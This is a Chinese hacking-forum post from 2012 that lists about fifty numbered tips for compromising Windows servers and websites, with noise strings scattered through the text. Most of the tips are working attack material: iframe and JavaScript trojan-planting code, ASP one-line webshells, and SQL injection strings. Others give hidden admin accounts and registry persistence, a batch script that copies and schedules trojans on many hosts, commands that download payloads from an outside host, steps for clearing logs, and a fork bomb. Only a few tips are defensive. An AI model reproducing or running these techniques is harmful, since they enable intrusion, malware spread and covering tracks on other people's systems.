中国网络渗透测试联盟

标题: 一些笔记 [打印本页]

作者: admin    时间: 2012-9-15 14:51
标题: 一些笔记
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,) I6 P+ g% k0 f9 s/ ~7 w
cacls C:\windows\system32 /G hqw20:R4 }* i) i1 C0 h% }
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
# W* N3 m  y, I  d/ @- L% f恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F" ]8 n, }1 k2 m
* V" b: z& L8 c5 h  V
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。5 f# O. j7 Y0 ^' H6 m

4 K1 D9 X6 C7 d/ E; W3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。& D& k3 O: |: ~' F' J& }$ I+ z
( F: w9 K8 P( U5 G& s7 H5 Z
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号* `, \" M, n2 A4 L% X

# f& [( k1 t# V% T5、利用INF文件来修改注册表
/ T3 g* j# k3 y$ f[Version]  n; v- s8 h0 v  {" X+ x
Signature="$CHICAGO$"4 V, j6 A9 `: O* H
[Defaultinstall], G( }  F2 R+ }$ h4 y  m6 @
addREG=Ating
7 j1 j1 Q) R( ]% X[Ating]  A) D. p0 A9 h" m
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
/ n; c. A: j' A: }$ J1 R以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
" I1 `" ^3 H3 r) `& @8 R! F( X: prundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
) A& g/ T3 P" P6 j/ f/ I9 r. C6 L2 l其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU' g1 G0 L% `3 B  O  d$ ?0 V8 U$ R
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
9 s1 m2 p. A9 t, l. THKEY_CURRENT_CONFIG 简写为 HKCC  O7 f4 _  C: Q8 R/ X& i, C% U
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值. G! u' R! K' y
"1"这里代表是写入或删除注册表键值中的具体数据
0 D% _3 s5 V* X# E! v* C
* e% X1 O5 b/ ]: ?( [9 i3 p( F9 H# z6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
' C! H# ^% @$ X. ], O4 D4 W, U4 p2 ^多了一步就是在防火墙里添加个端口,然后导出其键值
( A6 u5 f7 d& s' w- x[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
0 ]* `7 {0 F) H+ z1 M9 ~  F9 c+ o8 K4 M/ M  ]( U
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽  q0 ]- ?3 d% U0 U& O/ ~
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
( s- M6 l3 u4 R4 l- S, Q7 Y% X( N) ?/ x+ c# I/ W' L3 c' K: n
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。& N/ c3 t; U" b
! w- d* ?3 g3 K" l- o. U4 R2 l2 |. ~
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
  D- J* g8 Z- S9 _5 }可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。+ E3 z# k8 @& r' U% J* B; Z. D/ M9 y
; x% M1 L5 ?  m! t
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
8 t- E1 N* K- u8 o% P4 g( b- ~2 e, Y# G1 ^7 ~) s3 L  [. B
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,( o  @5 q! U- D' G* R5 K4 N
用法:xsniff –pass –hide –log pass.txt
' ?% F( Y+ }4 C2 m) P: u, Z2 l7 ?: }# I* {4 Z, x) F
12、google搜索的艺术
9 z* [0 t$ t+ o) T2 W% b搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”$ T- `  F8 g! N/ _2 X7 H8 G0 \9 ]" z
或“字符串的语法错误”可以找到很多sql注入漏洞。
" b/ L% B, f' v0 M
1 d2 M9 m% I+ M5 D13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
1 j6 ~6 A4 H: n
7 C4 L7 H. X. w1 \6 A9 ^14、cmd中输入 nc –vv –l –p 1987# l8 O, d2 C  B3 z9 A7 M5 d
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
2 V) S! N4 |/ p1 T% a& r, U/ B  a& [- c7 D7 ~
15、制作T++木马,先写个ating.hta文件,内容为
7 e$ |* D8 J7 q2 r8 ^2 T& E1 g' O. i<script language="VBScript">
! p' O( k+ p; R! q. ~4 Wset wshshell=createobject ("wscript.shell" )2 Z2 j8 x2 H& E/ M5 h( m6 H/ a1 O1 c$ x
a=wshshell.run("你马的名称",1)
8 G6 C% B  _4 y6 B( fwindow.close
5 v& f% l/ A3 q! Z* P7 d/ f</script>
- y' ]( w! C6 i  a8 d再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。9 H- y! ?9 E' y3 q5 i" _+ B5 U

2 t( Z3 X: B- F7 l# j: w* `6 X4 \16、搜索栏里输入
2 E8 h6 o& P. Q! ^; _* Z$ ?; X7 n关键字%'and 1=1 and '%'='
9 I+ F5 H, ~- M关键字%'and 1=2 and '%'='
0 o) y- A$ r  b  f! \比较不同处 可以作为注入的特征字符3 J2 \9 s( C3 `
# {2 v" d+ C  o+ f# u
17、挂马代码<html>8 \' y- [$ x1 [$ Q- V' z8 V  a
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
* e) M- b- j% g8 l9 E: G& r* c</html>
) {4 U$ ~8 B- X  T* s+ i! u# U  D! f- \
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
, V5 d$ V, d: u+ J( u5 Snet localgroup administrators还是可以看出Guest是管理员来。2 S; L* V7 d8 \, N( t) `* y

9 V/ x. }" t* y4 ?- n0 t+ y19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
" [% H8 R  L5 R; w& \" A7 c用法: 安装: instsrv.exe 服务名称 路径
" d# R6 ^: W% @: Q7 J. w卸载: instsrv.exe 服务名称 REMOVE+ ~* {# P& W' X9 B3 j! w
9 p9 P6 {8 ]0 D( z' K' s
/ x1 M; b0 W/ R5 k1 g  \. f
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
. d3 M# a% v% {  L* o. Z不能注入时要第一时间想到%5c暴库。- @: x) B  Z& V5 ^7 ~# r
4 q$ p  i) }# \1 |
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
0 O+ o4 j7 g9 ~, U: l) v
: b( R$ `8 y6 y/ N; T7 {* \23、缺少xp_cmdshell时
3 b' p. D  X3 ~6 k4 g! B6 |3 f尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'' U! f& w# C1 m, W7 w
假如恢复不成功,可以尝试直接加用户(针对开3389的)# J. w% u1 r" L* z6 `) \& L
declare @o int# ?1 u4 l* L0 b7 u
exec sp_oacreate 'wscript.shell',@o out* O: O$ S+ C/ I+ s% X2 O
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员! j& w& k# s7 n( S) h

; {- B/ H- p8 a% a24.批量种植木马.bat0 T' |  W6 p% z
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
/ X1 m2 W( Z0 Q9 N. P: k  Sfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
% Y- @. @3 f$ i& b( r* ]5 o, b* ]5 l扫描地址.txt里每个主机名一行 用\\开头5 ?! p8 g8 s; ]% A) r4 R
0 D/ j/ P" K* k- ?, l7 H
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
/ l3 O2 `7 e3 Z- A0 Q- [$ E
& G% |3 c1 c7 w/ z$ h6 ?26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.1 M2 F4 G+ r, i1 r! [- V. I# F- g
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下./ o% c$ V1 b- L; \
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
! Z$ \+ i# R+ @; g; v# }6 s: k. u+ j5 ?
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
$ [- u  r2 w9 `& w然后用#clear logg和#clear line vty *删除日志
) O( I, }; p) N7 `$ v0 x1 m3 K0 v$ o( K
28、电脑坏了省去重新安装系统的方法
3 M  t8 F: l' R, g纯dos下执行,& y6 `/ K+ N8 J; B1 l' L$ h' L$ R2 E
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config, Z0 O8 ]/ y: l/ }7 I
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
" K* B+ `4 p3 T7 L
9 v+ r+ n0 h6 A- ]- b' x1 T+ ^29、解决TCP/IP筛选 在注册表里有三处,分别是:
5 Y: O! n( p3 J3 {$ I! ^( h& p& Q1 WHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
7 @( w+ m5 @6 S; rHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip& t& L( M' ?/ e
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip1 Q# S' @5 i( w- V1 y
分别用* ?. a# ^/ i  A# m" E, {8 h1 r
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip* M4 G, G6 ]2 J, L6 l6 P
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip% k1 G9 s0 O6 g5 A
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip$ ?/ P: _; @+ B. \5 k% q
命令来导出注册表项( X( w- {0 M, A% `
然后把三个文件里的EnableSecurityFilters"=dword:00000001,9 i, o4 K& v; Z. E- u3 V
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
& P5 o5 R, e8 V5 bregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
8 f, c& E! v9 n" U; F
6 f: G$ `* a8 m# ]30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
' C" ?. l* s9 S6 Y0 a  _SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
2 q( c  V2 H8 J( P3 g4 {! |: E2 y5 J$ q3 E; o+ C. a
31、全手工打造开3389工具" Z+ }1 X+ o' n. O( C( k
打开记事本,编辑内容如下:6 S8 L, O( H% n8 V
echo [Components] > c:\sql
5 d) R4 A1 g/ u: H1 iecho TSEnable = on >> c:\sql3 Y# b7 m% U. S
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
7 H7 u2 u( U$ l) R# N- c% E7 D编辑好后存为BAT文件,上传至肉鸡,执行& y: z9 j% b# P

0 ~! t2 h( p5 A4 N! u* o6 ]- l' p32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马1 g  A1 G  G+ u1 D  `; ~7 U* L

2 L, H# Q# s* p- v33、让服务器重启
8 e8 S  g* Z8 m. l& v- J9 d写个bat死循环:% V* U2 W2 n, `* Y3 N- _# U
@echo off
/ a7 }6 b1 A0 j; ^:loop1% D3 r" X! f# D: q2 e
cls# R4 R9 i+ \$ D% Z7 X# d
start cmd.exe
, X* z2 k6 x+ o7 d. p  q/ ^) Egoto loop1
4 n4 g/ k+ R$ c保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
5 @3 T8 ^: f1 f4 ^5 A/ [/ v' P. g( T3 ^5 @% g8 ^4 U3 }
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,& \' z; N" j, a: [3 S8 r: B$ |3 |
@echo off
9 E+ P! @; v8 Jdate /t >c:/3389.txt
- S2 q5 @; ^2 ^# l: Y' \time /t >>c:/3389.txt
, E, ~- }- \7 r- R: Z) b! Hattrib +s +h c:/3389.bat0 ^( F  s8 \1 g  M
attrib +s +h c:/3389.txt
- E2 G- S9 u5 d- a8 {( E! anetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
! b) N( j7 D+ S2 h. T- i并保存为3389.bat/ f& j! d) Q6 L& |% W: q
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号; p6 E6 ]3 `6 t. e- k( ?

' D% t: {; J+ H  _35、有时候提不了权限的话,试试这个命令,在命令行里输入:
8 |9 h, p4 T2 bstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
- u6 y/ |) l7 K; I输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
! Q; Y3 T7 W+ Z0 Y) _5 R* c  F8 E8 y8 F. N- [
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件5 R; E! P4 X5 D
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
* B5 ?9 G0 Z# Decho 你的FTP账号 >>c:\1.bat //输入账号
5 M; B1 A& k' e3 Fecho 你的FTP密码 >>c:\1.bat //输入密码, i( T' w: B8 U* p
echo bin >>c:\1.bat //登入% G9 \0 M, ~& ^& r! F% Y. c
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么7 L9 N3 P" h: ^) [: r
echo bye >>c:\1.bat //退出" j9 g) Y+ O; Q3 a2 C- A
然后执行ftp -s:c:\1.bat即可
( s4 X6 n' |. k( g% F2 q- q- g& i: T7 ^9 [9 J6 N
37、修改注册表开3389两法
+ m' Z; s* _4 H. D- E(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表7 b( O- I# d+ G
echo Windows Registry Editor Version 5.00 >>3389.reg$ k8 q" H) ^: s3 M9 u; j
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg1 ^% O; k& b: G
echo "Enabled"="0" >>3389.reg
5 N& v8 N' ]( q) mecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows$ O+ k, t% ?. s
NT\CurrentVersion\Winlogon] >>3389.reg9 H" \" N$ i, N. |
echo "ShutdownWithoutLogon"="0" >>3389.reg& ]: W' e5 ?; X' ~1 N5 t
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]( o& L6 n0 o( ~$ n3 g0 Q
>>3389.reg
% Y3 e9 x' O1 O( Z3 s7 c# }6 U, _7 [echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg" Q* d& X$ N# [2 W: c  W( d" J  u
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]5 x* ^) v7 T2 ~
>>3389.reg
- m0 y7 f+ b/ \% g7 Q& i, Qecho "TSEnabled"=dword:00000001 >>3389.reg
$ V$ b: N( N6 A4 ?9 hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
  |  Z, H( c& _! u. j% _echo "Start"=dword:00000002 >>3389.reg
- p6 o( X0 c0 _8 I; ^echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
1 z( i$ T% j$ N9 p7 Q% ~& N5 J>>3389.reg2 {6 Y) _& @2 F' G2 Q( C
echo "Start"=dword:00000002 >>3389.reg6 P/ L# W# {" P/ R% q
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg! R) c, N# v0 C
echo "Hotkey"="1" >>3389.reg$ f" r8 q, q5 B6 l$ H5 }0 T
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# X3 ~) A) ~0 _* ]8 O; S2 DServer\Wds\rdpwd\Tds\tcp] >>3389.reg1 z0 v( {5 n. n1 O' F5 v2 |% u# @
echo "PortNumber"=dword:00000D3D >>3389.reg7 `  K* v* I0 x/ F- F- f% B+ E
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal- k) F2 r/ R/ p, B
Server\WinStations\RDP-Tcp] >>3389.reg6 ~6 U; T: v4 q" c7 \0 c7 ~
echo "PortNumber"=dword:00000D3D >>3389.reg
% A6 j9 ]: V6 P; [把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。5 ^3 ?: H0 W; @" F3 X/ E
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)$ M! G- A0 W9 Y* P" T
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
% B3 C% F1 n( ~(2)winxp和win2003终端开启
+ `& Y  z( F9 Z3 B8 T! W- V" i: X用以下ECHO代码写一个REG文件:! n8 t. x  n- P/ _# \" x) Y$ _
echo Windows Registry Editor Version 5.00>>3389.reg" R- H" x4 r5 D
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- y2 ^9 B  {* I! F6 F) X  l: [Server]>>3389.reg  ^# b& [' C: X1 |$ f
echo "fDenyTSConnections"=dword:00000000>>3389.reg! [+ m7 ^$ ?1 f/ W
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
! M+ K& D( ]- J; A/ @0 XServer\Wds\rdpwd\Tds\tcp]>>3389.reg8 F* w" P$ N/ f! c0 W& z
echo "PortNumber"=dword:00000d3d>>3389.reg' X) Q4 I+ X; O& g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
' L! q; f% j; O  z& `1 Q3 C: {Server\WinStations\RDP-Tcp]>>3389.reg$ t1 b6 [; b+ [/ e* R5 I6 |5 Z
echo "PortNumber"=dword:00000d3d>>3389.reg1 \7 S- z; s1 h4 \; t  H
然后regedit /s 3389.reg del 3389.reg9 R3 p- ^. U2 H& f
XP下不论开终端还是改终端端口都不需重启) ]6 b7 B& c& R; e7 m

; o; m) l. H9 t5 i3 X% M38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃; ?5 N5 m0 y0 z  G! a
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
2 f7 a4 ]! N% @0 t  Z& P
& X, x6 w5 T+ y% v, U39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!) i; l1 U! d3 @
(1)数据库文件名应复杂并要有特殊字符4 E0 G9 c5 L  [
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源! X9 ?/ ]5 B/ B( B
将conn.asp文档中的/ g. E5 z7 f3 D  u2 b$ ^
DBPath = Server.MapPath("数据库.mdb")& a0 Y8 k, R9 D2 ~0 q& t3 i
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
/ p( g$ x# f" z8 }* v% ~* C0 [6 N; V
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
) w. X6 p! p9 T: q0 W. n7 W6 f% t(3)不放在WEB目录里
& T1 Q$ ]9 r0 C' J3 H
3 @! b+ k& w: H7 t) r/ Q8 b40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
. v( f/ K- v. z$ u可以写两个bat文件
/ w3 z5 S% E" B; q. H2 I@echo off
; B! U/ j/ r  [3 \: F5 u@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
2 v! v; Q7 N4 {3 G. @$ ?@del c:\winnt\system32\query.exe5 q0 u. |" q3 s( w- {3 f* u+ r
@del %SYSTEMROOT%\system32\dllcache\query.exe
  u2 I  P% q. s2 f# Z6 D% [4 W@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的. E6 a1 `3 k$ `7 G9 M* k
4 ]: G- }' B! M! @, N
@echo off
) X! U# b% P% i6 x% R1 J@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe  g: r% @4 y' I$ w1 M
@del c:\winnt\system32\tsadmin.exe
" a$ C- D4 E7 c1 k1 S+ {: O@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex! t7 A6 |' S8 s7 s' @' u# A
# b6 r: S5 I+ @+ s0 q
41、映射对方盘符3 X7 h# J- y0 E4 C6 V! [7 i- J
telnet到他的机器上,$ n, b% i" v/ H' J9 T
net share 查看有没有默认共享 如果没有,那么就接着运行5 @' y2 W( F3 Y, M
net share c$=c:
# ], @5 C- ^6 C- b+ Y6 d6 vnet share现在有c$
$ v, ^" e+ B& J" e5 X  G# Z. g在自己的机器上运行
  a! U6 }/ O, T/ h% Q/ C/ z6 d$ Jnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
! b5 s) g  C! |" ?
6 {; @( t5 S  q5 X  H3 t0 J42、一些很有用的老知识
2 X- Z' _0 M8 f1 D4 Ftype c:\boot.ini ( 查看系统版本 )
; o& e0 ?; K) P7 w& {net start (查看已经启动的服务)
$ s1 n5 X9 Q" o; {6 w# i& kquery user ( 查看当前终端连接 ); O/ x6 Z  k* ^: T
net user ( 查看当前用户 )
) ^1 B& k1 H% k1 P$ j( L! Wnet user 用户 密码/add ( 建立账号 )
& Q8 j* u6 L* v3 Lnet localgroup administrators 用户 /add (提升某用户为管理员)
8 ~5 _- W, S$ @4 V5 Xipconfig -all ( 查看IP什么的 )
9 t0 L$ V  U3 r) |9 B" U; Ynetstat -an ( 查看当前网络状态 )
8 D% w* C9 o+ G( o  b8 G. }8 Yfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码), o, M- l6 S7 _% E9 k0 m/ T' ]1 ~, W
克隆时Administrator对应1F4( u  h7 P0 E+ w) M' g, \
guest对应1F5, r4 k" d4 m) {
tsinternetuser对应3E8
1 `& d4 v, V" _8 p4 O; T) z
# n5 a. g0 x/ k2 ?' b/ b5 K1 V* l3 R43、如果对方没开3389,但是装了Remote Administrator Service
  b1 Y3 V. L; |, G用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
6 N6 E2 p7 ?2 |$ d, g8 ?0 ?解释:用serv-u漏洞导入自己配制好的radmin的注册表信息& e5 N/ r7 {0 M
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
7 Q+ w( F! ~; j# B  E
1 L0 Z$ n9 _7 A: [9 W, I! g44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
6 I: V. a0 G8 m$ g6 I1 V* B本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)4 q+ d5 ]" _" o8 _4 c% Z" L
. l1 U9 {% a8 p1 U) s' d8 j
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)" z: V/ X  k( d
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
* Y+ K1 O- k( w, l, I  E/ t1 |) t* A^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
5 X& O1 g- S7 j) d6 aCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
% o( c; r( t9 U% q" E" w1 s  g1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
$ D" p) n7 A& A8 w(这是完整的一句话,其中没有换行符)
2 E) m/ l/ f: r5 Q& f! u2 B- t. w! p然后下载:" d/ _7 G- E# L* F7 b6 x5 U: j
cscript down.vbs http://www.hack520.org/hack.exe hack.exe( @2 X- |0 A% z$ d7 j2 M$ }" ]* ^. b

$ ]$ H2 R6 G# c9 O/ R! m4 g  ]46、一句话木马成功依赖于两个条件:
) V7 }% B. t/ ~% m7 G$ r1、服务端没有禁止adodb.Stream或FSO组件3 T8 j/ |) B: [. d9 F% b
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。9 R8 Y! H9 n- S" i  b" o

+ V! E5 H+ Z/ {: N* o47、利用DB_OWNER权限进行手工备份一句话木马的代码:
. }2 l8 a4 P* _;alter database utsz set RECOVERY FULL--0 p7 a! o% d* U: E7 `. T
;create table cmd (a image)--' v2 h7 y2 I) _# D& |6 C: R
;backup log utsz to disk = 'D:\cmd' with init--
7 I: A% h5 P4 C% K$ i  f6 h) A;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--' d4 ]# L3 u/ I
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--. E( v$ H; i. {- u
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
/ ^* u% G, Q$ k. n4 f7 s; C1 l, m- u' H  ?; l5 o
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:4 R0 r8 r2 O- Q7 }1 l* N

7 E3 s. |" e) ^0 R* f5 r用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options6 o0 I2 ?$ M/ e) U+ g9 Q0 K1 {
所有会话用 'all'。
5 f# j. A7 I! r. b1 c2 }! R-s sessionid 列出会话的信息。6 d: K% G5 z+ j+ f
-k sessionid 终止会话。7 O/ D* s6 u$ I$ o4 N9 Q
-m sessionid 发送消息到会话。5 L+ m- r0 J, k2 V9 V

3 H0 c; C# f7 b# F3 n$ h: ]) @9 pconfig 配置 telnet 服务器参数。
& \* c/ I3 U  j2 z/ N  s+ {1 i# X3 a/ {  n  O
common_options 为:
) a8 L! m- n3 `) u$ Y-u user 指定要使用其凭据的用户
3 r8 y- m* H0 k$ V1 F# d. {-p password 用户密码1 d. O0 d  E+ S% L

& C: u( `; W) w" b$ f. N+ j4 `config_options 为:4 R0 e2 j1 N, h
dom = domain 设定用户的默认域; d# u# ]8 b. f3 {
ctrlakeymap = yes|no 设定 ALT 键的映射) J( @5 b0 x/ x% e
timeout = hh:mm:ss 设定空闲会话超时值
1 }  Q7 u$ H& r+ `  V- Utimeoutactive = yes|no 启用空闲会话。
* X" M( Y) P1 R5 m% r; ~* Pmaxfail = attempts 设定断开前失败的登录企图数。
4 v$ O  s8 R3 q( T+ H5 S! amaxconn = connections 设定最大连接数。
. l2 Z. B( z- k/ A3 Yport = number 设定 telnet 端口。. @3 q. ^& X8 Y* \
sec = [+/-]NTLM [+/-]passwd
0 p8 \7 n& J; G: W, q* }7 ~设定身份验证机构
5 p& X6 B# @; Q* Y  o3 Kfname = file 指定审计文件名。
; c3 d8 c8 f1 d* T" Ufsize = size 指定审计文件的最大尺寸(MB)。
+ }4 j0 R" M* r: l% L  a( W; [- S* ^3 R( gmode = console|stream 指定操作模式。
' D& T) C0 D9 J! T) iauditlocation = eventlog|file|both& U6 g& n2 W* c- H; E9 |
指定记录地点: Y* ]  _0 T' C8 |$ c/ _3 c) w% h
audit = [+/-]user [+/-]fail [+/-]admin! f8 n( x3 X2 n; j' `1 j
* l5 `5 y5 p, h# D: C/ z  r  I
49、例如:在IE上访问:
# _7 W, a; W. f& `5 @www.hack520.org/hack.txt就会跳转到http://www.hack520.org/6 t) u$ I/ P. l! Y$ z7 x
hack.txt里面的代码是:
# L; y% r( N& F' m& A<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
( }8 ?2 M' T" Y; j( Y% }把这个hack.txt发到你空间就可以了!5 f8 w1 W- o8 a; L/ d4 m; f5 x+ O
这个可以利用来做网马哦!
. b# u6 D- M# O! Z1 I# l  v, R% a+ \9 @  Z( y
50、autorun的病毒可以通过手动限制!0 `( c0 a4 v- E
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!  ^/ Q) F* O- i! [" i3 ]
2,打开盘符用右键打开!切忌双击盘符~
* _" q  ^) e$ ~. S0 P- C9 ]" h3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!$ ^6 l+ }! {0 W( U9 G8 s

' S) x) v- c9 m. g2 y' D51、log备份时的一句话木马:6 C# ~1 S. c' P* }' u" f
a).<%%25Execute(request("go"))%%25>
, b8 r! }0 |4 K" a6 Ab).<%Execute(request("go"))%>
2 Z; c' E" `; e6 L1 rc).%><%execute request("go")%><%
